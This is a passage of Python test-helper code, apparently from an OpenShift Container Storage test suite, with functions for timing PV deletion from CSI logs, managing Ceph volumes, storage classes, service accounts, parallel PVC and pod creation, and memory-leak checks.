# due to some delay in CSI log generation added wait
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for pv in pv_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f'delete "{pv}": started', i)]
end = [i for i in logs if re.search(f'delete "{pv}": succeeded', i)]
if not start or not end:
no_data_list.append(pv)
if no_data_list:
# Clear and get CSI logs after 60secs
logging.info(f"PV count without CSI delete log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logging.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pv deletion data in CSI logs for {no_data_list}"
)
continue
else:
break
pv_dict = dict()
this_year = str(datetime.datetime.now().year)
for pv_name in pv_name_list:
# Extract the deletion start time for the PV
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start_tm = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start_tm, DATE_TIME_FORMAT)
# Extract the deletion end time for the PV
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end_tm = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end_tm, DATE_TIME_FORMAT)
total = end_time - start_time
if not return_log_times:
pv_dict[pv_name] = total.total_seconds()
else:
pv_dict[pv_name] = (start_tm, end_tm)
return pv_dict
def get_start_deletion_time(interface, pv_name):
"""
Get the starting deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: Start time of PVC deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC deletion
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_deletion_time(interface, pv_name):
"""
Get the ending deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: End time of PVC deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PV deletion
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_deletion_time(interface, pv_name):
"""
Measure PVC deletion time based on logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PV for creation time measurement
Returns:
float: Deletion time for the PVC
"""
start = get_start_deletion_time(interface=interface, pv_name=pv_name)
end = get_end_deletion_time(interface=interface, pv_name=pv_name)
total = end - start
return total.total_seconds()
def pod_start_time(pod_obj):
"""
Function to measure time taken for container(s) to get into running state
by measuring the difference between container's start time (when container
went into running state) and started time (when container was actually
started)
Args:
pod_obj(obj): pod object to measure start time
Returns:
containers_start_time(dict):
Returns the name and start time of container(s) in a pod
"""
time_format = "%Y-%m-%dT%H:%M:%SZ"
containers_start_time = {}
start_time = pod_obj.data["status"]["startTime"]
start_time = datetime.datetime.strptime(start_time, time_format)
for container in range(len(pod_obj.data["status"]["containerStatuses"])):
started_time = pod_obj.data["status"]["containerStatuses"][container]["state"][
"running"
]["startedAt"]
started_time = datetime.datetime.strptime(started_time, time_format)
container_name = pod_obj.data["status"]["containerStatuses"][container]["name"]
container_start_time = (started_time - start_time).seconds
containers_start_time[container_name] = container_start_time
return containers_start_time
def get_default_storage_class():
"""
Get the default StorageClass(es)
Returns:
list: default StorageClass(es) list
"""
default_sc_obj = ocp.OCP(kind="StorageClass")
storage_classes = default_sc_obj.get().get("items")
storage_classes = [
sc for sc in storage_classes if "annotations" in sc.get("metadata")
]
return [
sc.get("metadata").get("name")
for sc in storage_classes
if sc.get("metadata")
.get("annotations")
.get("storageclass.kubernetes.io/is-default-class")
== "true"
]
def change_default_storageclass(scname):
"""
Change the default StorageClass to the given SC name
Args:
scname (str): StorageClass name
Returns:
bool: True on success
"""
default_sc = get_default_storage_class()
ocp_obj = ocp.OCP(kind="StorageClass")
if default_sc:
# Change the existing default Storageclass annotation to false
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"false"}}}\' '
)
patch_cmd = f"patch storageclass {default_sc} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
# Change the new storageclass to default
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"true"}}}\' '
)
patch_cmd = f"patch storageclass {scname} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
return True
def is_volume_present_in_backend(interface, image_uuid, pool_name=None):
"""
Check whether Image/Subvolume is present in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
Returns:
bool: True if volume is present and False if volume is not present
"""
cmd = ""
valid_error = []
ct_pod = pod.get_ceph_tools_pod()
if interface == constants.CEPHBLOCKPOOL:
valid_error = [f"error opening image csi-vol-{image_uuid}"]
cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
if interface == constants.CEPHFILESYSTEM:
valid_error = [
f"Subvolume 'csi-vol-{image_uuid}' not found",
f"subvolume 'csi-vol-{image_uuid}' does not exist",
]
cmd = (
f"ceph fs subvolume getpath {get_cephfs_name()}"
f" csi-vol-{image_uuid} csi"
)
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format="json")
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} exists " f"in backend"
)
return True
except CommandFailed as ecf:
assert any([error in str(ecf) for error in valid_error]), (
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
)
logger.info(
f"Volume corresponding to uuid {image_uuid} does not exist " f"in backend"
)
return False
def verify_volume_deleted_in_backend(
interface, image_uuid, pool_name=None, timeout=180
):
"""
Ensure that Image/Subvolume is deleted in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
timeout (int): Wait time for the volume to be deleted.
Returns:
bool: True if volume is deleted before timeout.
False if volume is not deleted.
"""
try:
for ret in TimeoutSampler(
timeout,
2,
is_volume_present_in_backend,
interface=interface,
image_uuid=image_uuid,
pool_name=pool_name,
):
if not ret:
break
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
f"in backend"
)
return True
except TimeoutExpiredError:
logger.error(
f"Volume corresponding to uuid {image_uuid} is not deleted " f"in backend"
)
# Log 'ceph progress' and 'ceph rbd task list' for debugging purpose
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd("ceph progress json", format=None)
ct_pod.exec_ceph_cmd("ceph rbd task list")
return False
def delete_volume_in_backend(img_uuid, pool_name=None):
"""
Delete an Image/Subvolume in the backend
Args:
img_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): The of the pool
Returns:
bool: True if image deleted successfully
False if:
Pool not found
image not found
image not deleted
"""
cmd = ""
valid_error = []
pool_cr = get_pool_cr(pool_name)
if pool_cr is not None:
if pool_cr["kind"] == "CephFilesystem":
interface = "CephFileSystem"
else:
interface = pool_cr["kind"]
logger.info(f"pool {pool_cr} kind is {interface}")
else:
logger.info(
f"Pool {pool_name} has no kind of "
f"{constants.CEPHBLOCKPOOL} "
f"or {constants.CEPHFILESYSTEM}"
)
return False
# Checking if image is present before trying to delete
image_present_results = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
# Incase image is present delete
if image_present_results:
if interface == constants.CEPHBLOCKPOOL:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = ["No such file or directory"]
cmd = f"rbd rm -p {pool_name} csi-vol-{img_uuid}"
if interface == constants.CEPHFILESYSTEM:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = [
f"Subvolume 'csi-vol-{img_uuid}' not found",
f"subvolume 'csi-vol-{img_uuid}' does not exist",
]
cmd = f"ceph fs subvolume rm {get_cephfs_name()} csi-vol-{img_uuid} csi"
ct_pod = pod.get_ceph_tools_pod()
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format=None)
except CommandFailed as ecf:
if any([error in str(ecf) for error in valid_error]):
logger.info(
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {img_uuid}. Interface type: {interface}"
)
return False
verify_img_delete_result = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
if not verify_img_delete_result:
logger.info(f"Image csi-vol-{img_uuid} deleted successfully")
return True
else:
logger.info(f"Image csi-vol-{img_uuid} not deleted successfully")
return False
return False
def create_serviceaccount(namespace):
"""
Create a Serviceaccount
Args:
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
service_account_data = templating.load_yaml(constants.SERVICE_ACCOUNT_YAML)
service_account_data["metadata"]["name"] = create_unique_resource_name(
"sa", "serviceaccount"
)
service_account_data["metadata"]["namespace"] = namespace
return create_resource(**service_account_data)
def get_serviceaccount_obj(sa_name, namespace):
"""
Get serviceaccount obj
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
try:
sa_dict = ocp_sa_obj.get(resource_name=sa_name)
return OCS(**sa_dict)
except CommandFailed:
logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace, scc_name=constants.PRIVILEGED):
"""
Validate serviceaccount is added to scc of privileged
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
scc_name (str): SCC name
Returns:
bool: True if sc_name is present in scc of privileged else False
"""
sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
logger.info(sa_name)
ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
scc_dict = ocp_scc_obj.get(resource_name=scc_name)
scc_users_list = scc_dict.get("users")
for scc_user in scc_users_list:
if scc_user == sa_name:
return True
return False
def add_scc_policy(sa_name, namespace):
"""
Adding ServiceAccount to scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy creation
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy add-scc-to-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def remove_scc_policy(sa_name, namespace):
"""
Removing ServiceAccount from scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy deletion
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy remove-scc-from-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def craft_s3_command(cmd, mcg_obj=None, api=False):
"""
Crafts the AWS CLI S3 command including the
login credentials and command to be ran
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI command to run
api: True if the call is for s3api, false if s3
Returns:
str: The crafted command, ready to be executed on the pod
"""
api = "api" if api else ""
if mcg_obj:
base_command = (
f'sh -c "AWS_CA_BUNDLE={constants.SERVICE_CA_CRT_AWSCLI_PATH} '
f"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
f"AWS_DEFAULT_REGION={mcg_obj.region} "
f"aws s3{api} "
f"--endpoint={mcg_obj.s3_internal_endpoint} "
)
string_wrapper = '"'
else:
base_command = f"aws s3{api} --no-sign-request "
string_wrapper = ""
return f"{base_command}{cmd}{string_wrapper}"
def get_current_test_name():
"""
A function to return the current test name in a parsed manner
Returns:
str: The test name.
"""
return os.environ.get("PYTEST_CURRENT_TEST").split(":")[-1].split(" ")[0]
def setup_pod_directories(pod_obj, dir_names):
"""
Creates directories on the specified pod.
Directories created under the respective test name directory.
Args:
pod_obj: A pod object on which to create directories
dir_names: A list of directories names to create.
Returns:
list: A list of all the full paths of the created directories
"""
full_dirs_path = []
test_name = get_current_test_name()
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {test_name}")
for cur_dir in dir_names:
current = f"{test_name}/{cur_dir}"
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {current}")
full_dirs_path.append(current)
return full_dirs_path
def wait_for_resource_count_change(
func_to_use,
previous_num,
namespace,
change_type="increase",
min_difference=1,
timeout=20,
interval=2,
**func_kwargs,
):
"""
Wait for a change in total count of PVC or pod
Args:
func_to_use (function): Function to be used to fetch resource info
Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
previous_num (int): Previous number of pods/PVCs for comparison
namespace (str): Name of the namespace
change_type (str): Type of change to check. Accepted values are
'increase' and 'decrease'. Default is 'increase'.
min_difference (int): Minimum required difference in PVC/pod count
timeout (int): Maximum wait time in seconds
interval (int): Time in seconds to wait between consecutive checks
Returns:
True if difference in count is greater than or equal to
'min_difference'. False in case of timeout.
"""
try:
for sample in TimeoutSampler(
timeout, interval, func_to_use, namespace, **func_kwargs
):
if func_to_use == pod.get_all_pods:
current_num = len(sample)
else:
current_num = len(sample["items"])
if change_type == "increase":
count_diff = current_num - previous_num
else:
count_diff = previous_num - current_num
if count_diff >= min_difference:
return True
except TimeoutExpiredError:
return False
def verify_pv_mounted_on_node(node_pv_dict):
"""
Check if mount point of a PV exists on a node
Args:
node_pv_dict (dict): Node to PV list mapping
eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}
Returns:
dict: Node to existing PV list mapping
eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
"""
existing_pvs = {}
for node_name, pvs in node_pv_dict.items():
cmd = f"oc debug nodes/{node_name} -- df"
df_on_node = run_cmd(cmd)
existing_pvs[node_name] = []
for pv_name in pvs:
if f"/pv/{pv_name}/" in df_on_node:
existing_pvs[node_name].append(pv_name)
return existing_pvs
def converge_lists(list_to_converge):
"""
Function to flatten and remove the sublist created during future obj
Args:
list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]
Returns:
list (list): return converged list eg: [1,2,3,4]
"""
return [item for sublist in list_to_converge for item in sublist]
def create_multiple_pvc_parallel(sc_obj, namespace, number_of_pvc, size, access_modes):
"""
Funtion to create multiple PVC in parallel using threads
Function will create PVCs based on the available access modes
Args:
sc_obj (str): Storage Class object
namespace (str): The namespace for creating pvc
number_of_pvc (int): NUmber of pvc to be created
size (str): size of the pvc eg: '10Gi'
access_modes (list): List of access modes for PVC creation
Returns:
pvc_objs_list (list): List of pvc objs created in function
"""
obj_status_list, result_lists = ([] for i in range(2))
with ThreadPoolExecutor() as executor:
for mode in access_modes:
result_lists.append(
executor.submit(
create_multiple_pvcs,
sc_name=sc_obj.name,
namespace=namespace,
number_of_pvc=number_of_pvc,
access_mode=mode,
size=size,
)
)
result_list = [result.result() for result in result_lists]
pvc_objs_list = converge_lists(result_list)
# Check for all the pvcs in Bound state
with ThreadPoolExecutor() as executor:
for objs in pvc_objs_list:
obj_status_list.append(
executor.submit(wait_for_resource_state, objs, "Bound", 90)
)
if False in [obj.result() for obj in obj_status_list]:
raise TimeoutExpiredError
return pvc_objs_list
def create_pods_parallel(
pvc_list,
namespace,
interface,
pod_dict_path=None,
sa_name=None,
raw_block_pv=False,
dc_deployment=False,
node_selector=None,
):
"""
Function to create pods in parallel
Args:
pvc_list (list): List of pvcs to be attached in pods
namespace (str): The namespace for creating pod
interface (str): The interface backed the PVC
pod_dict_path (str): pod_dict_path for yaml
sa_name (str): sa_name for providing permission
raw_block_pv (bool): Either RAW block or not
dc_deployment (bool): Either DC deployment or not
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
pod_objs (list): Returns list of pods created
"""
future_pod_objs = []
# Added 300 sec wait time since in scale test once the setup has more
# PODs time taken for the pod to be up will be based on resource available
wait_time = 300
if raw_block_pv and not pod_dict_path:
pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
with ThreadPoolExecutor() as executor:
for pvc_obj in pvc_list:
future_pod_objs.append(
executor.submit(
create_pod,
interface_type=interface,
pvc_name=pvc_obj.name,
do_reload=False,
namespace=namespace,
raw_block_pv=raw_block_pv,
pod_dict_path=pod_dict_path,
sa_name=sa_name,
dc_deployment=dc_deployment,
node_selector=node_selector,
)
)
pod_objs = [pvc_obj.result() for pvc_obj in future_pod_objs]
# Check for all the pods are in Running state
# In above pod creation not waiting for the pod to be created because of threads usage
with ThreadPoolExecutor() as executor:
for obj in pod_objs:
future_pod_objs.append(
executor.submit(
wait_for_resource_state, obj, "Running", timeout=wait_time
)
)
# If pods not up raise exception/failure
if False in [obj.result() for obj in future_pod_objs]:
raise TimeoutExpiredError
return pod_objs
def delete_objs_parallel(obj_list):
"""
Function to delete objs specified in list
Args:
obj_list(list): List can be obj of pod, pvc, etc
Returns:
bool: True if obj deleted else False
"""
threads = list()
for obj in obj_list:
process = threading.Thread(target=obj.delete)
process.start()
threads.append(process)
for process in threads:
process.join()
return True
def memory_leak_analysis(median_dict):
"""
Function to analyse Memory leak after execution of test case Memory leak is
analyzed based on top output "RES" value of ceph-osd daemon, i.e.
``list[7]`` in code.
More Detail on Median value: For calculating memory leak require a constant
value, which should not be start or end of test, so calculating it by
getting memory for 180 sec before TC execution and take a median out of it.
Memory value could be different for each nodes, so identify constant value
for each node and update in median_dict
Args:
median_dict (dict): dict of worker nodes and respective median value
eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}
Usage::
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
# dict to store memory leak difference for each worker
diff = {}
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
number_of_lines = len(memory_leak_data) - 1
# Get the start value form median_dict arg for respective worker
start_value = median_dict[f"{worker}"]
end_value = memory_leak_data[number_of_lines]
logging.info(f"Median value {start_value}")
logging.info(f"End value {end_value}")
# Convert the values to kb for calculations
if start_value.__contains__("g"):
start_value = float(1024 ** 2 * float(start_value[:-1]))
elif start_value.__contains__("m"):
start_value = float(1024 * float(start_value[:-1]))
else:
start_value = float(start_value)
if end_value.__contains__("g"):
end_value = float(1024 ** 2 * float(end_value[:-1]))
elif end_value.__contains__("m"):
end_value = float(1024 * float(end_value[:-1]))
else:
end_value = float(end_value)
# Calculate the percentage of diff between start and end value
# Based on value decide TC pass or fail
diff[worker] = ((end_value - start_value) / start_value) * 100
logging.info(f"Percentage diff in start and end value {diff[worker]}")
if diff[worker] <= 20:
logging.info(f"No memory leak in worker {worker} passing the test")
else:
logging.info(f"There is a memory leak in worker {worker}")
logging.info(f"Memory median value start of the test {start_value}")
logging.info(f"Memory value end of the test {end_value}")
raise UnexpectedBehaviour
def get_memory_leak_median_value():
"""
Function to calculate memory leak Median value by collecting the data for 180 sec
and find the median value which will be considered as starting point
to evaluate memory leak using "RES" value of ceph-osd daemon i.e. list[7] in code
Returns:
median_dict (dict): dict of worker nodes and respective median value
"""
median_dict = {}
timeout = 180 # wait for 180 sec to evaluate memory leak median data.
logger.info(f"waiting for {timeout} sec to evaluate the median value")
time.sleep(timeout)
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
median_dict[f"{worker}"] = statistics.median(memory_leak_data)
return median_dict
def refresh_oc_login_connection(user=None, password=None):
"""
Function to refresh oc user login
Default login using kubeadmin user and password
Args:
user (str): Username to login
password (str): Password to login
"""
user = user or config.RUN["username"]
if not password:
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["password_location"]
)
with open(filename) as f:
password = f.read()
ocs_obj = ocp.OCP()
ocs_obj.login(user=user, password=password)
def rsync_kubeconf_to_node(node):
"""
Function to copy kubeconfig to OCP node
Args:
node (str): OCP node to copy kubeconfig if not present
"""
# ocp_obj = ocp.OCP()
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["kubeconfig_location"]
)
file_path = os.path.dirname(filename)
master_list = node.get_master_nodes()
ocp_obj = ocp.OCP()
check_auth = "auth"
check_conf = "kubeconfig"
node_path = "/home/core/"
if check_auth not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
elif check_conf not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}auth"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
def create_dummy_osd(deployment):
"""
Replace one of OSD pods with pod that contains all data from original
OSD but doesn't run osd daemon. This can be used e.g. for direct acccess
to Ceph Placement Groups.
Args:
deployment (str): Name of deployment to use
Returns:
list: first item is dummy deployment object, second item is dummy pod
object
"""
oc = OCP(
kind=constants.DEPLOYMENT, namespace=config.ENV_DATA.get("cluster_namespace")
)
osd_data = oc.get(deployment)
dummy_deployment = create_unique_resource_name("dummy", "osd")
osd_data["metadata"]["name"] = dummy_deployment
osd_containers = osd_data.get("spec").get("template").get("spec").get("containers")
# get osd container spec
original_osd_args = osd_containers[0].get("args")
osd_data["spec"]["template"]["spec"]["containers"][0]["args"] = []
osd_data["spec"]["template"]["spec"]["containers"][0]["command"] = [
"/bin/bash",
"-c",
"sleep infinity",
]
osd_file = tempfile.NamedTemporaryFile(
mode="w+", prefix=dummy_deployment, delete=False
)
with open(osd_file.name, "w") as temp:
yaml.dump(osd_data, temp)
oc.create(osd_file.name)
# downscale the original deployment and start dummy deployment instead
oc.exec_oc_cmd(f"scale --replicas=0 deployment/{deployment}")
oc.exec_oc_cmd(f"scale --replicas=1 deployment/{dummy_deployment}")
osd_list = pod.get_osd_pods()
dummy_pod = [pod for pod in osd_list if dummy_deployment in pod.name][0]
wait_for_resource_state(
resource=dummy_pod, state=constants.STATUS_RUNNING, timeout=60
)
ceph_init_cmd = "/rook/tini" + " " + " ".join(original_osd_args)
try:
logger.info("Following command should expire after 7 seconds")
dummy_pod.exec_cmd_on_pod(ceph_init_cmd, timeout=7)
except TimeoutExpired:
logger.info("Killing /rook/tini process")
try:
dummy_pod.exec_sh_cmd_on_pod(
"kill $(ps aux | grep '[/]rook/tini' | awk '{print $2}')"
)
except CommandFailed:
pass
return dummy_deployment, dummy_pod
def get_failure_domin():
"""
Function is used to getting failure domain of pool
Returns:
str: Failure domain from cephblockpool
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd(ceph_cmd="ceph osd crush rule dump", format="json")
assert out, "Failed to get cmd output"
for crush_rule in out:
if constants.CEPHBLOCKPOOL.lower() in crush_rule.get("rule_name"):
for steps in crush_rule.get("steps"):
if "type" in steps:
return steps.get("type")
def wait_for_ct_pod_recovery():
"""
In case the of node failures scenarios, in which the selected node is
running the ceph tools pod, we'll want to wait for the pod recovery
Returns:
bool: True in case the ceph tools pod was recovered, False otherwise
"""
try:
_ = get_admin_key()
except CommandFailed as ex:
logger.info(str(ex))
if "connection timed out" in str(ex):
logger.info(
"Ceph tools box was running on the node that had a failure. "
"Hence, waiting for a new Ceph tools box pod to spin up"
)
wait_for_resource_count_change(
func_to_use=pod.get_all_pods,
previous_num=1,
namespace=config.ENV_DATA["cluster_namespace"],
timeout=120,
selector=constants.TOOL_APP_LABEL,
)
return True
else:
return False
return True
def label_worker_node(node_list, label_key, label_value):
"""
Function to label worker node for running app pods on specific worker nodes.
Args:
node_list (list): List of node name
label_key (str): Label_key to be added in worker
label_value (str): Label_value
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}={label_value}",
out_yaml_format=False,
)
logger.info(out)
def remove_label_from_worker_node(node_list, label_key):
"""
Function to remove label from worker node.
Args:
node_list (list): List of node name
label_key (str): Label_key to be remove from worker node
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}-", out_yaml_format=False
)
logger.info(out)
def get_pods_nodes_logs():
"""
Get logs from all pods and nodes
Returns:
dict: node/pod name as key, logs content as value (string)
"""
all_logs = {}
all_pods = pod.get_all_pods()
all_nodes = node.get_node_objs()
for node_obj in all_nodes:
node_name = node_obj.name
log_content = node.get_node_logs(node_name)
all_logs.update({node_name: log_content})
for pod_obj in all_pods:
try:
pod_name = pod_obj.name
log_content = pod.get_pod_logs(pod_name)
all_logs.update({pod_name: log_content})
except CommandFailed:
pass
return all_logs
def get_logs_with_errors(errors=None):
"""
From logs of all pods and nodes, get only logs
containing any of specified errors
Args:
errors (list): List of errors to look for
Returns:
dict: node/pod name as key, logs content as value; may be empty
"""
all_logs = get_pods_nodes_logs()
output_logs = {}
errors_list = constants.CRITICAL_ERRORS
if errors:
errors_list = errors_list + errors
for name, log_content in all_logs.items():
for error_msg in errors_list:
if error_msg in log_content:
logger.debug(f"Found '{error_msg}' in log of {name}")
output_logs.update({name: log_content})
log_path = f"{ocsci_log_path()}/{name}.log"
with open(log_path, "w") as fh:
fh.write(log_content)
return output_logs
def modify_osd_replica_count(resource_name, replica_count):
"""
Function to modify osd replica count to 0 or 1
Args:
resource_name (str): Name of osd i.e, 'rook-ceph-osd-0-c9c4bc7c-bkf4b'
replica_count (int): osd replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
resource_name = "-".join(resource_name.split("-")[0:4])
return ocp_obj.patch(resource_name=resource_name, params=params)
def modify_deployment_replica_count(deployment_name, replica_count):
"""
Function to modify deployment replica count,
i.e to scale up or down deployment
Args:
deployment_name (str): Name of deployment
replica_count (int): replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=deployment_name, params=params)
def collect_performance_stats(dir_name):
"""
Collect performance stats and saves them in file in json format.
dir_name (str): directory name to store stats.
Performance stats include:
IOPs and throughput percentage of cluster
CPU, memory consumption of each nodes
"""
from ocs_ci.ocs.cluster import CephCluster
log_dir_path = os.path.join(
os.path.expanduser(config.RUN["log_dir"]),
f"failed_testcase_ocs_logs_{config.RUN['run_id']}",
f"{dir_name}_performance_stats",
)
if not os.path.exists(log_dir_path):
logger.info(f"Creating directory {log_dir_path}")
os.makedirs(log_dir_path)
performance_stats = {}
external = config.DEPLOYMENT["external_mode"]
if external:
# Skip collecting performance_stats for external mode RHCS cluster
logging.info("Skipping status collection for external mode")
else:
ceph_obj = CephCluster()
# Get iops and throughput percentage of cluster
iops_percentage = ceph_obj.get_iops_percentage()
throughput_percentage = ceph_obj.get_throughput_percentage()
performance_stats["iops_percentage"] = iops_percentage
performance_stats["throughput_percentage"] = throughput_percentage
# ToDo: Get iops and throughput percentage of each nodes
# Get the cpu and memory of each nodes from adm top
master_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="master")
)
worker_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="worker")
)
